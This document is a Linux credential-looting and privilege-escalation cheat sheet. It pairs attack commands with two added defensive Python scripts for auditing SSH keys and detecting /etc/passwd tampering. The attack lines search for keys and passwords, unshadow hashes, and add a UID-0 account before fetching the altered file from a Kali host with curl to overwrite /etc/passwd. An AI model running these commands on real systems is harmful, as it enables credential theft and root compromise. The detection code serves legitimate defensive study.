Password Loot

Lootttt

# Locating SSH keys
ls -la /home/<user>/.ssh   # cat fails on a directory; list it, then cat the individual key files
find / -name authorized_keys 2> /dev/null
find / -name id_rsa 2> /dev/null
chmod 600 id_rsa
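The find commands above only locate key files. The script below, an added example that is not part of the original notes, audits what it finds from the defender's side: private keys readable by group or other, private keys stored without a passphrase (for the openssh-key-v1 container it reads the cipher name; "none" means unencrypted), and every active authorized_keys entry. The sample .ssh directory it scans is constructed inside build_sample(), and fake_openssh_key() only produces a container header, not a usable key.

```python
"""Audit an .ssh directory for risky key material (added example, not from the original notes).

Flags: private keys readable by group/other, private keys stored without a passphrase,
and every active authorized_keys entry. Sample files are constructed inside build_sample().
"""
import base64
import os
import stat
import struct
import tempfile

OPENSSH_HEADER = b"-----BEGIN OPENSSH PRIVATE KEY-----"
PEM_HEADERS = (b"-----BEGIN RSA PRIVATE KEY-----",
               b"-----BEGIN EC PRIVATE KEY-----",
               b"-----BEGIN DSA PRIVATE KEY-----")


def is_private_key(data):
    return data.lstrip().startswith((OPENSSH_HEADER,) + PEM_HEADERS)


def openssh_cipher(data):
    """Cipher name from the openssh-key-v1 container; 'none' means the key is not encrypted."""
    body = "".join(l for l in data.decode(errors="replace").splitlines()
                   if l and not l.startswith("-----"))
    blob = base64.b64decode(body)
    magic = b"openssh-key-v1\x00"
    off = len(magic)
    if not blob.startswith(magic) or len(blob) < off + 4:
        return None
    (length,) = struct.unpack(">I", blob[off:off + 4])
    return blob[off + 4:off + 4 + length].decode(errors="replace")


def is_unencrypted(data):
    if data.lstrip().startswith(OPENSSH_HEADER):
        return openssh_cipher(data) == "none"
    # Passphrase-protected PEM keys carry a 'Proc-Type: 4,ENCRYPTED' header line.
    return b"ENCRYPTED" not in data


def audit(root):
    """Return (kind, path, detail) findings for every file under root."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            mode = stat.S_IMODE(os.lstat(path).st_mode)
            with open(path, "rb") as fh:
                data = fh.read()
            if is_private_key(data):
                if mode & 0o077:                      # anything beyond owner rw is too loose
                    findings.append(("loose-perms", path, oct(mode)))
                if is_unencrypted(data):
                    findings.append(("no-passphrase", path, ""))
            elif name == "authorized_keys":
                for line in data.decode(errors="replace").splitlines():
                    line = line.strip()
                    if line and not line.startswith("#"):
                        findings.append(("authorized-key", path, line))
    return findings


def fake_openssh_key(cipher):
    """Constructed stand-in: a valid container header with the given cipher name, not a real key."""
    blob = b"openssh-key-v1\x00" + struct.pack(">I", len(cipher)) + cipher.encode()
    b64 = base64.b64encode(blob).decode()
    return OPENSSH_HEADER + b"\n" + b64.encode() + b"\n-----END OPENSSH PRIVATE KEY-----\n"


def build_sample():
    """Create a temporary .ssh directory with constructed sample files; returns its path."""
    root = tempfile.mkdtemp(prefix="ssh-audit-")
    samples = {
        "id_rsa": (fake_openssh_key("none"), 0o644),            # unencrypted and world-readable
        "id_ed25519": (fake_openssh_key("aes256-ctr"), 0o600),  # encrypted, correct mode
        "authorized_keys": (b"# constructed sample\n"
                            b"ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAconstructed attacker@example\n", 0o644),
    }
    for name, (content, mode) in samples.items():
        path = os.path.join(root, name)
        with open(path, "wb") as fh:
            fh.write(content)
        os.chmod(path, mode)
    return root


if __name__ == "__main__":
    for kind, path, detail in audit(build_sample()):
        print(f"{kind:15} {path} {detail}")
```

Point audit() at a real home directory to get the same three finding kinds; an unexpected authorized-key entry or an unencrypted key with loose permissions is exactly what the find commands above would turn up for an attacker.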

# Finding passwords (slow: this walks the whole filesystem)
# -I skips binary files; avoid -w here, because a pattern ending in "=" followed by a word character is not a whole-word match
grep -rnIi --color=always "PASSWORD=" / 2> /dev/null

# Combining the passwd and shadow files for offline cracking (e.g. with john)
unshadow <passwd file> <shadow file> > unshadowed.txt

# If asterisks appear while you type a sudo password, the pwfeedback option is enabled
-> It's the pwfeedback attack
# Writable passwd file + cp command
ls -la /etc/shadow
ls -la /etc/passwd # check whether /etc/passwd is writable by your user

# On Kali,
cp /etc/passwd passwd1

# Append the chiya user (UID 0, with the password hash stored directly in the passwd entry) to passwd1, then cat passwd1 to check it.
nano passwd1
chiya:$1$ignite$3eTbJm98O9Hz.k1NTdNxe1:0:0:root:/root:/bin/bash

# On the victim machine, fetch passwd1 from Kali and overwrite the passwd file.
curl http://<KALI IP>:<PORT>/passwd1 -o /etc/passwd

Now log in over SSH or simply run su chiya.
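The technique above leaves two tell-tale marks in /etc/passwd: a real hash in the password field instead of the shadow placeholder "x", and a second UID-0 account. The script below is an added example, not part of the original notes, that parses passwd-format text and flags exactly those marks, plus empty password fields, duplicate names, malformed lines and a file mode writable by group or other (the condition the ls -la check above looks for). The CLEAN and TAMPERED samples are constructed; the chiya entry is the one from the notes.

```python
"""Spot tampering in /etc/passwd-format data (added example, not from the original notes).

Flags: a hash stored in the password field instead of the shadow placeholder 'x',
extra UID-0 accounts, empty password fields, duplicate names and malformed lines;
writable_by_others() checks the file mode that ls -la /etc/passwd shows.
The CLEAN/TAMPERED samples are constructed; the chiya entry is the one from the notes.
"""
import os
import stat

CLEAN = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:alice:/home/alice:/bin/bash
"""
TAMPERED = CLEAN + "chiya:$1$ignite$3eTbJm98O9Hz.k1NTdNxe1:0:0:root:/root:/bin/bash\n"

# Values that mean "look in /etc/shadow" or "login disabled"; anything else is a hash.
SHADOW_PLACEHOLDERS = {"x", "*", "!", "!!"}


def parse_passwd(text):
    """Yield (line_no, fields) for each non-comment line; fields is None when malformed."""
    for n, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        yield n, (fields if len(fields) == 7 else None)


def find_anomalies(text):
    """Return (line_no, kind, detail) tuples for every suspicious entry."""
    issues = []
    seen = set()
    lines = text.splitlines()
    for n, fields in parse_passwd(text):
        if fields is None:
            issues.append((n, "malformed", lines[n - 1]))
            continue
        name, pw, uid = fields[0], fields[1], fields[2]
        if pw == "":
            issues.append((n, "empty-password", name))
        elif pw not in SHADOW_PLACEHOLDERS:
            issues.append((n, "hash-in-passwd", name))
        if uid == "0" and name != "root":
            issues.append((n, "extra-uid0", name))
        if name in seen:
            issues.append((n, "duplicate-name", name))
        seen.add(name)
    return issues


def writable_by_others(mode):
    """True when group or other has write permission (mode as returned by os.stat)."""
    return bool(stat.S_IMODE(mode) & 0o022)


def check_file(path):
    """Run both checks against a real passwd file."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        issues = find_anomalies(fh.read())
    if writable_by_others(os.stat(path).st_mode):
        issues.append((0, "writable-by-others", path))
    return issues


if __name__ == "__main__":
    print("clean sample:", find_anomalies(CLEAN))
    print("tampered sample:", find_anomalies(TAMPERED))
    if os.path.exists("/etc/passwd"):
        print("live /etc/passwd:", check_file("/etc/passwd"))
```

Running check_file() on a host periodically, or diffing its output against a known-good baseline, catches the overwritten passwd file before the attacker's su or SSH login does.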
